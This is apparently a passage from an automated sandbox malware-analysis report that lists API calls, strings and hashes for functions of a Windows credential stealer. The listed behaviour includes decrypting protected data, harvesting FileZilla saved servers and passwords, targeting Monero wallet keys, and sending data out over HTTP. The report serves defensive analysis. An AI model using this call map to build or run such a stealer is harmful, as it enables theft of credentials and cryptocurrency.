                        • Opcode ID: 18d66bd8d15f026609caa022fe7d09303b5aebd313870a7bdbed936f53e3b335
                        • Instruction ID: d9f306fcf482dc4299533b6f3686312f2a3446c61de5d4f2e7fcb4ec1855394b
                        • Opcode Fuzzy Hash: 18d66bd8d15f026609caa022fe7d09303b5aebd313870a7bdbed936f53e3b335
                        • Instruction Fuzzy Hash: AA7229F3A0C6109FE3046E2DEC85A7ABBE9EF94720F1A453DEAC5C7744E53558018792
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00695184,40000001,00000000,00000000,?,00695184), ref: 006A8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
                        • Instruction ID: 9a439d2c5484e90a78306417e0ff991dcd008350426b39ee2cc5c4f17519628f
                        • Opcode Fuzzy Hash: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
                        • Instruction Fuzzy Hash: 69110670200209EFDB04EF64E884FAB37AABF8A340F109558F9198B250DB35EC41DF60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0126F238,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0126F238,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D
                        • wsprintfA.USER32 ref: 006A7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
                        • Instruction ID: bbf27f3a3e070804a67f96b8f8255eb22f867e9a13d4e51a6c7a3c3a75d0f28a
                        • Opcode Fuzzy Hash: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
                        • Instruction Fuzzy Hash: 2F11A5B1946228EBEB14DF54DC45FAAB778F705711F1043A6EA06932C0C7745E40CF51
                        APIs
                        • CoCreateInstance.COMBASE(006AE118,00000000,00000001,006AE108,00000000), ref: 006A3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006A37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 6d4c15dcab31ae23d9124caf8e7c7da9daefe018e24b401cdbf768cdc89d2b48
                        • Instruction ID: ba29e8f362df5c301f79ac502ede86b35bb08e48bc5412a8c11b032079fc0d73
                        • Opcode Fuzzy Hash: 6d4c15dcab31ae23d9124caf8e7c7da9daefe018e24b401cdbf768cdc89d2b48
                        • Instruction Fuzzy Hash: 9641F670A00A289FDB24DF58CC95B9BB7B5BB49702F4041D8F609A72D0E7B1AE85CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
                        • LocalFree.KERNEL32(?), ref: 00699BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: cf75dbba2050ac36c6e1c58f7fe772d1c6af206f65894ac1c981a254c29399bf
                        • Instruction ID: 3a73d9ed88448380f6f3171554266cbcf2e09e6a586cde93ad63215510eb7a4f
                        • Opcode Fuzzy Hash: cf75dbba2050ac36c6e1c58f7fe772d1c6af206f65894ac1c981a254c29399bf
                        • Instruction Fuzzy Hash: A411FAB4A01209EFCB04DF98D985AAE77B9FF88300F104569E915A7350D774AE10CF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2Eog$S|l{
                        • API String ID: 0-1362167614
                        • Opcode ID: 86e6f25168ecf9cf4af30dea0f15e5ba117ae0d506a0434defbec09c7e75f9a8
                        • Instruction ID: 588065f7a627f24aab1e7c795a51be1d963d77c5b3108f422b702a3f190eaaab
                        • Opcode Fuzzy Hash: 86e6f25168ecf9cf4af30dea0f15e5ba117ae0d506a0434defbec09c7e75f9a8
                        • Instruction Fuzzy Hash: 6452F4F3A0C2149FE304AF29EC8566AFBE5EF94720F16493DEAC4C3344E63558458A97
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
                        • StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
                        • StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0069FAC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 33a500b65204339e4dedddf0f5430e980a90c8e31464113818fa859265fd54b8
                        • Instruction ID: cb51aedcdeded0f3f6c7c3bd93384cd0512cf9a75ef626d824e78670e7e51ee8
                        • Opcode Fuzzy Hash: 33a500b65204339e4dedddf0f5430e980a90c8e31464113818fa859265fd54b8
                        • Instruction Fuzzy Hash: 2111A57180010DABDB94FBE0DC559EE737AAF12300F5142AEA51B56492EF342F4ACF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G>?w
                        • API String ID: 0-2681059745
                        • Opcode ID: a550cf64bd68b1e41eb60700b055cea33aa36c3e3cc0c3ed5a8a5603318e7199
                        • Instruction ID: e72b21a780c8002209f11f7a58c5ea1ef52b8ae706911c81c72f164788e72801
                        • Opcode Fuzzy Hash: a550cf64bd68b1e41eb60700b055cea33aa36c3e3cc0c3ed5a8a5603318e7199
                        • Instruction Fuzzy Hash: 6B61E5F3D086109FE3046E29DC8577AFBD6EB94320F17063DDAD897784E93558448786
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6ey~
                        • API String ID: 0-4082691886
                        • Opcode ID: 1d5a3ed9320b4f14cd4cc88a7a267063729e64255a817b1fe4eca3af5876770e
                        • Instruction ID: c5b42157c50e7ab893f8dfaf2d447e20dde5274bf1741bb0a547e8a143b7df59
                        • Opcode Fuzzy Hash: 1d5a3ed9320b4f14cd4cc88a7a267063729e64255a817b1fe4eca3af5876770e
                        • Instruction Fuzzy Hash: 2551D3B250CA01DBD3146E18DCC563FBFE9EB64700F26487D96C287B84E6355A509F83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Uk=w
                        • API String ID: 0-1033676908
                        • Opcode ID: 5415831277d145fc74631c866e4a11d6c09070bc90e56dab596c070db33546ed
                        • Instruction ID: dace6f2390d2a5368b92f8795b676b1af868452ef9b18c07b7a2cb81204f69be
                        • Opcode Fuzzy Hash: 5415831277d145fc74631c866e4a11d6c09070bc90e56dab596c070db33546ed
                        • Instruction Fuzzy Hash: 60413DA3F043185FE3446D7DED44777B78A97D0260F1B463ED948D7744E97A5C064282
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a95e3c5834afbdec105bf464d15ccb4601b658514b58447f22752c1cb5c00e4
                        • Instruction ID: e7ab9b11fde895958342fd77aecab11d7e0de23a44fc133172d968bb07fac593
                        • Opcode Fuzzy Hash: 4a95e3c5834afbdec105bf464d15ccb4601b658514b58447f22752c1cb5c00e4
                        • Instruction Fuzzy Hash: 6671FAF3A186105FE3089A2DDC9577AB7D5EFD8320F1B493DE6C9C7380E93558058692
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79bf4d642726bc3a562d9472627f8836d016938b7a37a8f2d9ff225c09bea299
                        • Instruction ID: 35fe1a2abdd0b6b415d77d221c82386b22fc3c0547e0c6eef4ec72fb1449d46a
                        • Opcode Fuzzy Hash: 79bf4d642726bc3a562d9472627f8836d016938b7a37a8f2d9ff225c09bea299
                        • Instruction Fuzzy Hash: 1D4119F3A082045BF314AD2ADC4573BBBDBDBD4320F2A853DDA8497784F93558064296
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97bcea0aab9705f1c70e7294a83d9ffa9f24a0a55d9ab2f5ccdb4d066d1f6f77
                        • Instruction ID: ccefa94afc5fc48fc899030a918093879c349639265a655b0abef49da0f76057
                        • Opcode Fuzzy Hash: 97bcea0aab9705f1c70e7294a83d9ffa9f24a0a55d9ab2f5ccdb4d066d1f6f77
                        • Instruction Fuzzy Hash: AE418BB220C7009FE3446E29EC8577AF7EAEFD4720F1A883EE2C4C7640DA7554858B56
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,006B0DBA,006B0DB7,006B0DB6,006B0DB3), ref: 006A0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 006A0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 006A03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 006A0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006A0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006A0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 006A0571
                        • lstrcat.KERNEL32(?,url: ), ref: 006A0580
                        • lstrcat.KERNEL32(?,00000000), ref: 006A0593
                        • lstrcat.KERNEL32(?,006B1678), ref: 006A05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 006A05B5
                        • lstrcat.KERNEL32(?,006B167C), ref: 006A05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 006A05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 006A05E6
                        • lstrcat.KERNEL32(?,006B1688), ref: 006A05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 006A0604
                        • lstrcat.KERNEL32(?,00000000), ref: 006A0617
                        • lstrcat.KERNEL32(?,006B1698), ref: 006A0626
                        • lstrcat.KERNEL32(?,006B169C), ref: 006A0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 2910d9433888e72e7d36e28cbebe697186cf5d49bcaddf3cc4e69864fbcdccb1
                        • Instruction ID: 7bda882ed5ab6ef92d4b28351467c3d935340bc35968620065f59815a243f3e1
                        • Opcode Fuzzy Hash: 2910d9433888e72e7d36e28cbebe697186cf5d49bcaddf3cc4e69864fbcdccb1
                        • Instruction Fuzzy Hash: E5D11BB1900108ABDB84FBE4DD96EEE777ABF19300F50451AF502A6091EF34AE46CF65
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006959F8
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 00695A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0126F9B0,00000000,?,0126B708,00000000,?,006B1A1C), ref: 00695E71
                        • lstrlen.KERNEL32(00000000), ref: 00695E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00695E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00695E9A
                        • lstrlen.KERNEL32(00000000), ref: 00695EAF
                        • lstrlen.KERNEL32(00000000), ref: 00695ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00695EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00695F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00695F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00695FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00695FBD
                        • HttpOpenRequestA.WININET(00000000,0126FA50,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00695BF8
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00695FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: ada27705decc24a451a04ada51347b0b6b8735a5a619eb87b80982028eafd4cd
                        • Instruction ID: 8ed1997b99afd71d2eabce489edbdba223019e72a776ff5b2f0a9cc5549a5295
                        • Opcode Fuzzy Hash: ada27705decc24a451a04ada51347b0b6b8735a5a619eb87b80982028eafd4cd
                        • Instruction Fuzzy Hash: C7121D71821118AADB95FBE0DC95FEEB37ABF15700F50419EB10662091EF342E4ACF69
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0069D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D208
                        • lstrcat.KERNEL32(?,006B1478), ref: 0069D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D22A
                        • lstrcat.KERNEL32(?,006B147C), ref: 0069D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D24C
                        • lstrcat.KERNEL32(?,006B1480), ref: 0069D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D26E
                        • lstrcat.KERNEL32(?,006B1484), ref: 0069D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D290
                        • lstrcat.KERNEL32(?,006B1488), ref: 0069D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D2B2
                        • lstrcat.KERNEL32(?,006B148C), ref: 0069D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D2D4
                        • lstrcat.KERNEL32(?,006B1490), ref: 0069D2E3
                          • Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
                          • Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885
                        • lstrlen.KERNEL32(?), ref: 0069D32A
                        • lstrlen.KERNEL32(?), ref: 0069D339
                          • Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(01268E90,0069A7A7,?,0069A7A7,01268E90), ref: 006AAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0069D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 1ed6473c6f73e3a1497af0258b59ca819ea1493d05a808c79bdaac20c58a7a74
                        • Instruction ID: bdc916cd8d5e4edccd75c0b6013fecb7d3ee548963346d7f0503740f3e685b47
                        • Opcode Fuzzy Hash: 1ed6473c6f73e3a1497af0258b59ca819ea1493d05a808c79bdaac20c58a7a74
                        • Instruction Fuzzy Hash: 2AE1F871911108ABCB88FBE0DD96EEE737ABF15301F10416AB507A6091DF35AE09CF66
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0126E520,00000000,?,006B144C,00000000,?,?), ref: 0069CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0069CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0069CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0069CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0069CAD9
                        • StrStrA.SHLWAPI(?,0126E4A8,006B0B52), ref: 0069CAF7
                        • StrStrA.SHLWAPI(00000000,0126E5F8), ref: 0069CB1E
                        • StrStrA.SHLWAPI(?,0126E690,00000000,?,006B1458,00000000,?,00000000,00000000,?,01268E80,00000000,?,006B1454,00000000,?), ref: 0069CCA2
                        • StrStrA.SHLWAPI(00000000,0126E670), ref: 0069CCB9
                          • Part of subcall function 0069C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
                          • Part of subcall function 0069C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
                        • StrStrA.SHLWAPI(?,0126E670,00000000,?,006B145C,00000000,?,00000000,01268F00), ref: 0069CD5A
                        • StrStrA.SHLWAPI(00000000,01269110), ref: 0069CD71
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978
                        • lstrlen.KERNEL32(00000000), ref: 0069CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0069CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
